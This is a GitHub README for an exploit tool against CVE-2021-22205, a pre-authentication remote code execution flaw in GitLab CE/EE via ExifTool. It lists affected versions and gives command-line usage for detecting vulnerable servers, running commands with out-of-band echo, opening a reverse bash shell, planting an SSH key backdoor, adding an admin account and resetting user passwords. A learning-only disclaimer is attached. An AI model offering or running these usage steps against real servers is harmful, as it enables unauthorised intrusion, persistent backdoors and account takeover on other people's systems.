CVE-2021-22205

GitLab CE/EE Preauth RCE using ExifTool

This project is for learning only, if someone’s rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do not bear any legal and joint liabilities

Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Affect Versions:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

Features

  • Gitlab version detection through the hash in Webpack manifest.json

  • Automatical out-of-band interactions with DNSLog & PostBin

  • Support Reverse Bash Shell / Append SSH Key to authorized_keys

  • Support ENTER to modify and restore gitlab user password

Usage

๐Ÿš โ€บโ€บโ€บ python CVE-2021-22205.py

      โ–‘โ–‘โ–‘โ–‘โ–โ–โ–‘โ–‘โ–‘  CVE-2021-22205
 โ–  โ–‘โ–‘โ–‘โ–‘โ–‘โ–„โ–ˆโ–ˆโ–„โ–„  GitLab CE/EE Unauthenticated RCE using ExifTool
  โ–€โ–€โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–€โ–‘โ–‘  Affecting all versions starting from 11.9
  โ–‘โ–‘โ–โ–โ–‘โ–‘โ–โ–โ–‘โ–‘  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 โ–’โ–’โ–’โ–โ–โ–’โ–’โ–โ–โ–’  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # ็‰ˆๆœฌ & ๆผๆดžๆŽขๆต‹
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # ๅ‘ฝไปคๆ‰ง่กŒ OOB ๅ›žๆ˜พ
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # ๅ‘ฝไปคๆ‰ง่กŒๅ†™ๆ–‡ไปถๅ›žๆ˜พ
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # ๅๅผน SHELL
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # SSH ๅŽ้—จๆคๅ…ฅ
    python3 CVE-2021-22205.py -u site_url -m add user pass # ๆทปๅŠ ็ฎก็†็”จๆˆท
    python3 CVE-2021-22205.py -u site_url -m mod user      # ไฟฎๆ”น user ๅฏ†็  => [email protected]
    python3 CVE-2021-22205.py -u site_url -m rec user      # ่ฟ˜ๅŽŸ user ๅฏ†็ 

Screenshot

Detect:

image-20211111130659726

RCE(Echo via PostBin OOB):

image-20211111132623307

Reverse Bash Shell:

image-20211111131442470

Append SSH Key to authorized_keys:

image-20211111133555010

Gitlab user password modification and restoration:

image-20211111132115090

Reference

GitHub

View Github